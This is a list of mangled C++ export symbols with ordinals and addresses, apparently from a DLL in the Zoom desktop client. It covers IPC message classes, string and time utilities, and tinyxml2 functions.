              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HH@Archive@Cmm@@6B@18810x4e5e7c
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18820x4ea114
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@H@Archive@Cmm@@6B@18830x4e957c
              ??_7?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@IV12@V12@HH@Archive@Cmm@@6B@18840x4ea24c
              ??_7?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@@Archive@Cmm@@6B@18850x4e6f20
              ??_7?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18860x4e8ab4
              ??_7?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@6B@18870x4e9c04
              ??_7?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@6B@18880x4ea09c
              ??_7?$CmmMessageTemplate_8@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@@Archive@Cmm@@6B@18890x4e8184
              ??_7?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@IIII@Archive@Cmm@@6B@18900x4e8ebc
              ??_7?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@6B@18910x4e6134
              ??_7?$CmmMessageTemplate_8@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18920x4e81cc
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@V12@@Archive@Cmm@@6B@18930x4e8544
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IHIHV12@H_K@Archive@Cmm@@6B@18940x4e8d9c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@II_JI@Archive@Cmm@@6B@18950x4e6374
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JH@Archive@Cmm@@6B@18960x4ea84c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@HHHHV12@H@Archive@Cmm@@6B@18970x4e861c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@@Archive@Cmm@@6B@18980x4e849c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18990x4e7d1c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@HH@Archive@Cmm@@6B@19000x4e7990
              ??_7?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@IV12@V12@HH_J@Archive@Cmm@@6B@19010x4e61bc
              ??_7?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@6B@19020x4ea3fc
              ??_7?$CmmMessageTemplate_9@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@@Archive@Cmm@@6B@19030x4e7fd4
              ??_7?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@H@Archive@Cmm@@6B@19040x4e8bd4
              ??_7?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@19050x4ea69c
              ??_7?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IHIHV12@H_KH@Archive@Cmm@@6B@19060x4e8ea4
              ??_7?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHH@Archive@Cmm@@6B@19070x4e8afc
              ??_7?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@6B@19080x4e615c
              ??_7?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@19090x4e7f2c
              ??_7?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@6B@19100x4e9b8c
              ??_7CCmmArchivePackageTree@Archive@Cmm@@6B@19110x4ec73c
              ??_7CCmmArchiveTreeNode@Archive@Cmm@@6B@19120x4ec868
              ??_7CFileName@Cmm@@6B@19130x4e34d0
              ??_7CIPCChannelThread@ssb_ipc@@6B@19140x4e921c
              ??_7CRefThread@Cmm@@6B@19150x4e9468
              ??_7CSBMBMessage_AddClientLog@@6B@19160x4e94d4
              ??_7CSBMBMessage_AddToCameraControlGroup@@6B@19170x4e9b2c
              ??_7CSBMBMessage_AppSupportNewWhiteBoardSetting@@6B@19180x4ea72c
              ??_7CSBMBMessage_Assisant_Keybase@@6B@19190x4e7d34
              ??_7CSBMBMessage_Assistant_Audio_Configure_Request@@6B@19200x4e5270
              ??_7CSBMBMessage_Assistant_Audio_Configure_Response@@6B@19210x4e9ae4
              ??_7CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@6B@19220x4e9c34
              ??_7CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@6B@19230x4e9cc4
              ??_7CSBMBMessage_Assistant_Broadcast_Clear_All_Audio_From_Txchannel_Response@@6B@19240x4e97bc
              ??_7CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@6B@19250x4e88a4
              ??_7CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Response@@6B@19260x4e9ff4
              ??_7CSBMBMessage_Assistant_Broadcast_Network_Audio_Stop_Proxy_Response@@6B@19270x4e5c18
              ??_7CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@6B@19280x4e8964
              ??_7CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@6B@19290x4e8fc4
              ??_7CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@6B@19300x4e9288
              ??_7CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@6B@19310x4e5450
              ??_7CSBMBMessage_Assistant_CEC_LoadResponse@@6B@19320x4e72a8
              ??_7CSBMBMessage_Assistant_CEC_PowerOnResponse@@6B@19330x4e7c2c
              ??_7CSBMBMessage_Assistant_CEC_StandByResponse@@6B@19340x4ea8ac
              ??_7CSBMBMessage_Assistant_CEC_UnloadResponse@@6B@19350x4e9504
              ??_7CSBMBMessage_Assistant_ControlSystem_CallDeviceSucceedNotify@@6B@19360x4ea684
              ??_7CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@6B@19370x4e6230
              ??_7CSBMBMessage_Assistant_ControlSystem_DevicesUpdatedNotify@@6B@19380x4e8604
              ??_7CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@6B@19390x4e56cc
              ??_7CSBMBMessage_Assistant_ControlSystem_ExecuteRuleRequest@@6B@19400x4ea864
              ??_7CSBMBMessage_Assistant_ControlSystem_ExecuteSceneRequest@@6B@19410x4e915c
              ??_7CSBMBMessage_Assistant_ControlSystem_LoadRequest@@6B@19420x4e52b8
              ??_7CSBMBMessage_Assistant_ControlSystem_ScenesPreparedNotify@@6B@19430x4e5198
              ??_7CSBMBMessage_Assistant_DAL_Service_Conf_Render_Change@@6B@19440x4e99ac
              ??_7CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@6B@19450x4e95ac
              ??_7CSBMBMessage_Assistant_DAL_Service_Identify_Device_Request@@6B@19460x4e58a4
              ??_7CSBMBMessage_Assistant_DAL_Service_Identify_Device_Response@@6B@19470x4e89c4
              ??_7CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@6B@19480x4e51f8
              ??_7CSBMBMessage_Assistant_DAL_Service_Load_Service_Response@@6B@19490x4e84e4
              ??_7CSBMBMessage_Assistant_DAL_Service_Network_Device_Added_Notification@@6B@19500x4e8694
              ??_7CSBMBMessage_Assistant_DAL_Service_Network_Device_List_Refresh_Notification@@6B@19510x4ea7ec
              ??_7CSBMBMessage_Assistant_DAL_Service_Network_Device_Removed_Notification@@6B@19520x4e7efc
              ??_7CSBMBMessage_Assistant_DAL_Service_Network_Device_Update_Notification@@6B@19530x4e7a60
              ??_7CSBMBMessage_Assistant_DAL_Service_Service_Components_Change_Notification@@6B@19540x4e8274
              ??_7CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@6B@19550x4e50d8
              ??_7CSBMBMessage_Assistant_DAL_Service_Service_Refresh_Device_List_Request@@6B@19560x4e5360
              ??_7CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@6B@19570x4ea8dc
              ??_7CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@6B@19580x4e96fc
              ??_7CSBMBMessage_Assistant_DAL_Service_Sip_Audio_Render_Change_Notification@@6B@19590x4e80dc
              ??_7CSBMBMessage_Assistant_DAL_Service_Sip_Render_Change@@6B@19600x4e9e5c
              ??_7CSBMBMessage_Assistant_DAL_Service_Unload_Service_Request@@6B@19610x4e837c
              ??_7CSBMBMessage_Assistant_DAL_Service_Unload_Service_Response@@6B@19620x4e825c
              ??_7CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Request@@6B@19630x4ea654
              ??_7CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Response@@6B@19640x4e6864
              ??_7CSBMBMessage_Assistant_DAL_Service_Use_Dante_Controller@@6B@19650x4e8d54
              ??_7CSBMBMessage_Assistant_Exit_Process@@6B@19660x4e9fac
              ??_7CSBMBMessage_Assistant_LineCallMergedNotification@@6B@19670x4ea3cc
              ??_7CSBMBMessage_Assistant_SIP_AudioDeviceFailNotification@@6B@19680x4e8f4c
              ??_7CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@6B@19690x4ea60c
              ??_7CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@6B@19700x4ea3b4
              ??_7CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@6B@19710x4e7550
              ??_7CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@6B@19720x4e966c
              ??_7CSBMBMessage_Assistant_SIP_CheckNomadic911Request@@6B@19730x4e7b4c
              ??_7CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@6B@19740x4e777c
              ??_7CSBMBMessage_Assistant_SIP_LineCallTerminatedNotification@@6B@19750x4e6264
              ??_7CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@6B@19760x4e8724
              ??_7CSBMBMessage_Assistant_SIP_MergeCallResponse@@6B@19770x4e978c
              ??_7CSBMBMessage_Assistant_SIP_MessageCountChanged@@6B@19780x4e54e0
              ??_7CSBMBMessage_Assistant_SIP_MessageUploadMemLog@@6B@19790x4e9cdc
              ??_7CSBMBMessage_Assistant_SIP_OnCallIncomingNotification@@6B@19800x4e7cbc
              ??_7CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@6B@19810x4e9240
              ??_7CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@6B@19820x4e9450
              ??_7CSBMBMessage_Assistant_SIP_OnCallRecordingStatusUpdateNotification@@6B@19830x4e840c
              ??_7CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@6B@19840x4e91ec
              ??_7CSBMBMessage_Assistant_SIP_OnCallTransferResultNotification@@6B@19850x4e8394
              ??_7CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@6B@19860x4e8244
              ??_7CSBMBMessage_Assistant_SIP_OnSIPServiceStatusChangedNotification@@6B@19870x4e674c
              ??_7CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@6B@19880x4e85a4
              ??_7CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@6B@19890x4e7a18
              ??_7CSBMBMessage_Assistant_SIP_SuspendToResume@@6B@19900x4e94a4
              ??_7CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@6B@19910x4e747c
              ??_7CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@6B@19920x4e87fc
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Microphone_Create_Request@@6B@19930x4ea45c
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Microphone_Created_Notification@@6B@19940x4e8034
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Microphone_Destroy_Request@@6B@19950x4e5540
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Microphone_Error_Notification@@6B@19960x4ea4bc
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Speaker_Create_Request@@6B@19970x4e85bc
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Speaker_Destroy_Request@@6B@19980x4e8a9c
              ??_7CSBMBMessage_Assistant_SIP_WMIActive@@6B@19990x4e7f8c
              ??_7CSBMBMessage_Assistant_Virtual_Audio_Register_Capturer_Proxy_Response@@6B@20000x4e55b8
              ??_7CSBMBMessage_Assistant_Virtual_Audio_Start_Capture_Response@@6B@20010x4e9300
              ??_7CSBMBMessage_Assistant_Virtual_Audio_Stop_Capture_Response@@6B@20020x4e8f04
              ??_7CSBMBMessage_Assistant_Voice_Command_Action_Request@@6B@20030x4e7280
              ??_7CSBMBMessage_Assistant_Voice_Command_Data_Request@@6B@20040x4e5168
              ??_7CSBMBMessage_Assistant_Voice_Command_Data_Response@@6B@20050x4e9f04
              ??_7CSBMBMessage_Assistant_Voice_Command_Start_Request@@6B@20060x4e5b88
              ??_7CSBMBMessage_Assistant_Voice_Command_Status_Notification@@6B@20070x4e59a4
              ??_7CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@6B@20080x4ea48c
              ??_7CSBMBMessage_Audio3rdSDK_AudioCmdNotify@@6B@20090x4ea12c
              ??_7CSBMBMessage_Audio3rdSDK_AudioCmdRequest@@6B@20100x4e9cf4
              ??_7CSBMBMessage_AudioFacilityStatus@@6B@20110x4e9db4
              ??_7CSBMBMessage_AvatarDataRequest@@6B@20120x4e8dcc
              ??_7CSBMBMessage_AvatarDataResponse@@6B@20130x4ea4ec
              ??_7CSBMBMessage_CCIScreenRecordingNotify@@6B@20140x4e62d0
              ??_7CSBMBMessage_CCIScreenRecordingRequest@@6B@20150x4e9994
              ??_7CSBMBMessage_CCIVideoAssignAndNotify@@6B@20160x4e9ebc
              ??_7CSBMBMessage_CCIVideoAudioChangeNotify@@6B@20170x4e5258
              ??_7CSBMBMessage_CCIVideoCancelInviteByPhoneRequest@@6B@20180x4e53a8
              ??_7CSBMBMessage_CCIVideoChangeBtnStatusRequest@@6B@20190x4e8334
              ??_7CSBMBMessage_CCIVideoChangeHostRequest@@6B@20200x4e9cac
              ??_7CSBMBMessage_CCIVideoChangeRecordStatusRequest@@6B@20210x4e828c
              ??_7CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@6B@20220x4e8cf4
              ??_7CSBMBMessage_CCIVideoCreateEmbedWindowRequest@@6B@20230x4e51c8
              ??_7CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@6B@20240x4e804c
              ??_7CSBMBMessage_CCIVideoDestroyEmbedWindowRequest@@6B@20250x4e91a4
              ??_7CSBMBMessage_CCIVideoEmbedWindowSendMsgRequest@@6B@20260x4ea51c
              ??_7CSBMBMessage_CCIVideoEndDropDownClickBtnNotify@@6B@20270x4e991c
              ??_7CSBMBMessage_CCIVideoEndDropdownButtonClickConfirmRequest@@6B@20280x4e9a0c
              ??_7CSBMBMessage_CCIVideoEndVideoNotify@@6B@20290x4e918c
              ??_7CSBMBMessage_CCIVideoEndVideoRequest@@6B@20300x4e7530
              ??_7CSBMBMessage_CCIVideoEventReportNotify@@6B@20310x4e8c94
              ??_7CSBMBMessage_CCIVideoGetCurrentUserRequest@@6B@20320x4e95dc
              ??_7CSBMBMessage_CCIVideoGetCurrentUserResponse@@6B@20330x4e9b5c
              ??_7CSBMBMessage_CCIVideoGetSupportCountryInfoRequest@@6B@20340x4ea264
              ??_7CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@6B@20350x4e9438
              ??_7CSBMBMessage_CCIVideoGetUserListRequest@@6B@20360x4e85ec
              ??_7CSBMBMessage_CCIVideoGetUserListResponse@@6B@20370x4e5300
              ??_7CSBMBMessage_CCIVideoHoldStatusChangeNotify@@6B@20380x4e9390
              ??_7CSBMBMessage_CCIVideoHostChangeNotify@@6B@20390x4ea0fc
              ??_7CSBMBMessage_CCIVideoInviteByPhoneRequest@@6B@20400x4e9f34
              ??_7CSBMBMessage_CCIVideoInviteByPhoneStatusNotify@@6B@20410x4e64d4
              ??_7CSBMBMessage_CCIVideoJoinMeetingRequest@@6B@20420x4e9e2c
              ??_7CSBMBMessage_CCIVideoJoinMeetingResponse@@6B@20430x4ea8f4
              ??_7CSBMBMessage_CCIVideoMuteAudioRequest@@6B@20440x4e9d3c
              ??_7CSBMBMessage_CCIVideoOnClosedCaptionChanged@@6B@20450x4e90cc
              ??_7CSBMBMessage_CCIVideoOnEmbedWindowSendMsgRequest@@6B@20460x4e8ba4
              ??_7CSBMBMessage_CCIVideoOnLiveCaptionChange@@6B@20470x4e888c
              ??_7CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@6B@20480x4ea084
              ??_7CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@6B@20490x4e9348
              ??_7CSBMBMessage_CCIVideoOnLiveTranscriptionStatusNotify@@6B@20500x4e903c
              ??_7CSBMBMessage_CCIVideoOnUserJoinNotify@@6B@20510x4e9420
              ??_7CSBMBMessage_CCIVideoOnUserLeaveNotify@@6B@20520x4e9408
              ??_7CSBMBMessage_CCIVideoOnUserUpdatedNotify@@6B@20530x4e89ac
              ??_7CSBMBMessage_CCIVideoOpenURLWithDefaultBrowser@@6B@20540x4e74ec
              ??_7CSBMBMessage_CCIVideoPTQuitNotify@@6B@20550x4ea81c
              ??_7CSBMBMessage_CCIVideoReceiveCommandNotify@@6B@20560x4e5600
              ??_7CSBMBMessage_CCIVideoRecordingStateChangeNotify@@6B@20570x4e83ac
              ??_7CSBMBMessage_CCIVideoRemoveUserRequest@@6B@20580x4e82a4
              ??_7CSBMBMessage_CCIVideoSendCommandRequest@@6B@20590x4e8094
              ??_7CSBMBMessage_CCIVideoSetDomainRequest@@6B@20600x4e9f7c
              ??_7CSBMBMessage_CCIVideoSetEndButtonDropdowRequest@@6B@20610x4e591c
              ??_7CSBMBMessage_CCIVideoSetEndButtonTextRequest@@6B@20620x4e9534
              ??_7CSBMBMessage_CCIVideoSetFullScreenRequest@@6B@20630x4e89f4
              ??_7CSBMBMessage_CCIVideoSetVBRequest@@6B@20640x4e581c
              ??_7CSBMBMessage_CCIVideoSettingsSyncFromPTRequest@@6B@20650x4ea6fc
              ??_7CSBMBMessage_CCIVideoSettingsSyncToPTRequest@@6B@20660x4e5108
              ??_7CSBMBMessage_CCIVideoShowEmbedWindowNotify@@6B@20670x4e6024
              ??_7CSBMBMessage_CCIVideoShowEmbedWindowRequest@@6B@20680x4e5180
              ??_7CSBMBMessage_CCIVideoUseAudioRequest@@6B@20690x4e76e0
              ??_7CSBMBMessage_CCIVideoUserDataUpdateNotify@@6B@20700x4e8c7c
              ??_7CSBMBMessage_CCIVideoWarmTransferNotify@@6B@20710x4e5390
              ??_7CSBMBMessage_CCIVideoWarmTransferRequest@@6B@20720x4e6efc
              ??_7CSBMBMessage_CDNEventIndication@@6B@20730x4e9114
              ??_7CSBMBMessage_CameraControlGroupAdded@@6B@20740x4e53c0
              ??_7CSBMBMessage_CameraControlGroupFetched@@6B@20750x4e98fc
              ??_7CSBMBMessage_CameraControlGroupRemoved@@6B@20760x4e912c
              ??_7CSBMBMessage_CancelDownloadComponent@@6B@20770x4e5ff0
              ??_7CSBMBMessage_ChatWithBuddy@@6B@20780x4e94bc
              ??_7CSBMBMessage_CheckInSessionReq@@6B@20790x4e9f1c
              ??_7CSBMBMessage_CheckInSessionRsp@@6B@20800x4e90e4
              ??_7CSBMBMessage_CheckNomadic911_Notification@@6B@20810x4e87e4
              ??_7CSBMBMessage_Client3rdSDK_SDKCmdNotify@@6B@20820x4e8514
              ??_7CSBMBMessage_Client3rdSDK_SDKCmdRequest@@6B@20830x4ea054
              ??_7CSBMBMessage_CompanionTokenRequest@@6B@20840x4e738c
              ??_7CSBMBMessage_CompanionTokenResponse@@6B@20850x4e864c
              ??_7CSBMBMessage_ComponentDownloadResult@@6B@20860x4ea204
              ??_7CSBMBMessage_ConfGetZRMeetingInfoReq@@6B@20870x4ea27c
              ??_7CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterRequest@@6B@20880x4e7f74
              ??_7CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@6B@20890x4ea834
              ??_7CSBMBMessage_ConfInterProcessAudioSharingServiceUnregisterResponse@@6B@20900x4ea024
              ??_7CSBMBMessage_ConfirmConfLeave@@6B@20910x4e7c44
              ??_7CSBMBMessage_ConfirmRecaptcha@@6B@20920x4e6700
              ??_7CSBMBMessage_Doc2ImgCancelConvertRequest@@6B@20930x4e9c7c
              ??_7CSBMBMessage_Doc2ImgCancelConvertResponse@@6B@20940x4e93a8
              ??_7CSBMBMessage_Doc2ImgConvertFinish@@6B@20950x4e997c
              ??_7CSBMBMessage_Doc2ImgConvertProgress@@6B@20960x4e9684
              ??_7CSBMBMessage_Doc2ImgStartConvertRequest@@6B@20970x4e897c
              ??_7CSBMBMessage_Doc2ImgStartConvertResponse@@6B@20980x4e7e0c
              ??_7CSBMBMessage_DocsShareStartMeetingCollaboratorsInviteInfo@@6B@20990x4e9024
              ??_7CSBMBMessage_ECDNInfo@@6B@21000x4e948c
              ??_7CSBMBMessage_ECDNSetBackupSuperNodeInfo@@6B@21010x4e54c8
              ??_7CSBMBMessage_ECDNUpdateSuperNodeMaxLoad@@6B@21020x4e8454
              ??_7CSBMBMessage_EnableQualtricsFeedback@@6B@21030x4ea78c
              ??_7CSBMBMessage_EnableSubscribePresence@@6B@21040x4e5240
              ??_7CSBMBMessage_GetPresence@@6B@21050x4e99c4
              ?FloatAttribute@XMLElement@tinyxml2@@QBEMPBDM@Z25380x4615f0
              ?FloatText@XMLElement@tinyxml2@@QBEMM@Z25390x461c10
              ?FloatValue@XMLAttribute@tinyxml2@@QBEMXZ25400x454640
              ?Flush@CFile@Cmm@@QAEXXZ25410x4117a0
              ?Format@?$CStringT@D@Cmm@@QAAXPBDZZ25420x405c10
              ?Format@?$CStringT@_W@Cmm@@QAAXPB_WZZ25430x403db0
              ?Format@CTime@Cmm@@QAEIPADIPBD@Z25440x411f80
              ?Format@CTime@Cmm@@QAEIPA_WIPB_W@Z25450x40e150
              ?FormatGmt@CTime@Cmm@@QAEIPADIPBD@Z25460x411fb0
              ?FormatGmt@CTime@Cmm@@QAEIPA_WIPB_W@Z25470x411fe0
              ?FormatMessageW@?$CStringT@D@Cmm@@QAAIPBDZZ25480x405bc0
              ?FormatMessageW@?$CStringT@_W@Cmm@@QAAIPB_WZZ25490x403d60
              ?FormatV@?$CStringT@D@Cmm@@QAEXPBDPAD@Z25500x405c30
              ?FormatV@?$CStringT@_W@Cmm@@QAEXPB_WPAD@Z25510x403dd0
              ?FreeArchiveObject@CCmmArchiveService@Cmm@@SAXPAVICmmArchiveObject@2@@Z25520x455de0
              ?FreeDuplicatedObj@CCmmArchiveServiceImp@Archive@Cmm@@QAEXPAVICmmArchiveObject@3@@Z25530x455520
              ?FreeMsg@CCmmMessageHelper@Cmm@@YAXPAVCmmMQ_Msg@2@@Z25540x453f80
              ?FreeSlot@ThreadLocalPlatform@internal@Cmm@@SAXAAK@Z25550x45f230
              ?FromDays@TimeDelta@Cmm@@SA?AV12@_J@Z25560x4122a0
              ?FromDoubleT@Time@Cmm@@SA?AV12@N@Z25570x451410
              ?FromExploded@Time@Cmm@@CA?AV12@_NABUExploded@12@@Z25580x4519e0
              ?FromFileTime@Time@Cmm@@SA?AV12@U_FILETIME@@@Z25590x451900
              ?FromHours@TimeDelta@Cmm@@SA?AV12@_J@Z25600x40e1f0
              ?FromInternalValue@Time@Cmm@@SA?AV12@_J@Z25610x412260
              ?FromLocalExploded@Time@Cmm@@SA?AV12@ABUExploded@12@@Z25620x40e190
              ?FromMicroseconds@TimeDelta@Cmm@@SA?AV12@_J@Z25630x412260
              ?FromMilliseconds@TimeDelta@Cmm@@SA?AV12@_J@Z25640x412330
              ?FromMinutes@TimeDelta@Cmm@@SA?AV12@_J@Z25650x4122d0
              ?FromSeconds@TimeDelta@Cmm@@SA?AV12@_J@Z25660x412300
              ?FromString@Time@Cmm@@SA_NPB_WPAV12@@Z25670x4154c0
              ?FromStringT@Time@Cmm@@SA?AV12@ABV?$CStringT@_W@2@@Z25680x451500
              ?FromTimeT@Time@Cmm@@SA?AV12@_J@Z25690x451320
              ?FromTimeTInMS@Time@Cmm@@SA?AV12@_J@Z25700x451390
              ?FromUTCExploded@Time@Cmm@@SA?AV12@ABUExploded@12@@Z25710x412240
              ?FromWStringHack@FilePath@Cmm@@SA?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z25720x45b6a0
              ?GenChannelName@CIPCChannelThread@ssb_ipc@@SAXABV?$CStringT@_W@Cmm@@IAAV34@@Z25730x4282a0
              ?Get@CAtomicInt@Cmm@@QBEJXZ25740x40c630
              ?GetAppPubCertPath@CFileName@Cmm@@QAEXXZ25750x412630
              ?GetAsFileTime@CTime@Cmm@@QBEXAAU_FILETIME@@@Z25760x411f50
              ?GetAsLocalTime@CTime@Cmm@@QBEXAAU_SYSTEMTIME@@@Z25770x411ef0
              ?GetAsSystemTime@CTime@Cmm@@QBEXAAU_SYSTEMTIME@@@Z25780x411e90
              ?GetAt@?$CStringT@D@Cmm@@QBEDI@Z25790x405970
              ?GetAt@?$CStringT@_W@Cmm@@QBE_WI@Z25800x403b10
              ?GetBase@CmmInternelMsg@Cmm@@QBEPBEXZ25810x40c640
              ?GetBody@CFileName@Cmm@@QBE?AV?$CFnRangeT@_W@2@XZ25820x4124b0
              ?GetBool@CCmmArchiveVarivant@Cmm@@QBEHXZ25830x459960
              ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z25840x405dd0
              ?GetBuffer@?$CStringT@D@Cmm@@QAEPADXZ25850x405e00
              ?GetBuffer@?$CStringT@_W@Cmm@@QAEPA_WI@Z25860x403f70
              ?GetBuffer@?$CStringT@_W@Cmm@@QAEPA_WXZ25870x403fa0
              ?GetBuffer@BinaryValue@@QAEPADXZ25880x416e70
              ?GetBuffer@BinaryValue@@QBEPBDXZ25890x416e70
              ?GetBufferSetLength@?$CStringT@D@Cmm@@QAEPADI@Z25900x405dc0
              ?GetBufferSetLength@?$CStringT@_W@Cmm@@QAEPA_WI@Z25910x403f60
              ?GetByte@CmmGUID@Cmm@@QAEHPAEAAI@Z25920x470c00
              ?GetCData@?$CStringT@D@Cmm@@QBEABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ25930x4043c0
              ?GetCData@?$CStringT@_W@Cmm@@QBEABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ25940x4043c0
              ?GetChar@CCmmArchiveVarivant@Cmm@@QBEDXZ25950x459970
              ?GetCharacterRef@XMLUtil@tinyxml2@@SAPBDPBDPADPAH@Z25960x45fe90
              ?GetComponents@FilePath@Cmm@@QBEXPAV?$vector@V?$CStringT@_W@Cmm@@V?$allocator@V?$CStringT@_W@Cmm@@@std@@@std@@@Z25970x45a8d0
              ?GetCountAttr@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ25980x454af0
              ?GetCurrentDirectoryW@CFileName@Cmm@@QAEXXZ25990x412510
              ?GetCurrentGmtTime@CTime@Cmm@@SA?AV12@XZ26000x402280
              ?GetCurrentTimeZone@Cmm@@YA?AV?$CStringT@_W@1@XZ26010x450be0
              ?GetCurrentTimeZoneOfZOOM@Cmm@@YA?AV?$CStringT@_W@1@XZ26020x450c30
              ?GetCurrentTimeZone_DisplayName@Cmm@@YA?AV?$CStringT@_W@1@H@Z26030x450ca0
              ?GetCurrentTimeZone_DisplayName@Cmm@@YA?AV?$CStringT@_W@1@XZ26040x450c80
              ?GetData@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ26050x4043c0
              ?GetData@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ26060x4043c0
              ?GetData@CCmmArchiveTreeNode@Archive@Cmm@@QAEAAVCCmmArchiveVarivant@3@XZ26070x40c930
              ?GetData@CmmInternelMsg@Cmm@@UBEPBEXZ26080x45f570
              ?GetDataType@CCmmArchiveVarivant@Cmm@@QBE?AW4ArchDataType@12@XZ26090x416e70
              ?GetDay@CTime@Cmm@@QBEHXZ26100x402300
              ?GetDayOfWeek@CTime@Cmm@@QBEHXZ26110x40e130
              ?GetDays@CSeconds@Cmm@@QBE_JXZ26120x411980
              ?GetDocument@XMLNode@tinyxml2@@QAEPAVXMLDocument@2@XZ26130x40c640
              ?GetDocument@XMLNode@tinyxml2@@QBEPBVXMLDocument@2@XZ26140x40c640
              ?GetDouble@CCmmArchiveVarivant@Cmm@@QBENXZ26150x459990
              ?GetExt@CFileName@Cmm@@QBEPB_WH@Z26160x4123e0
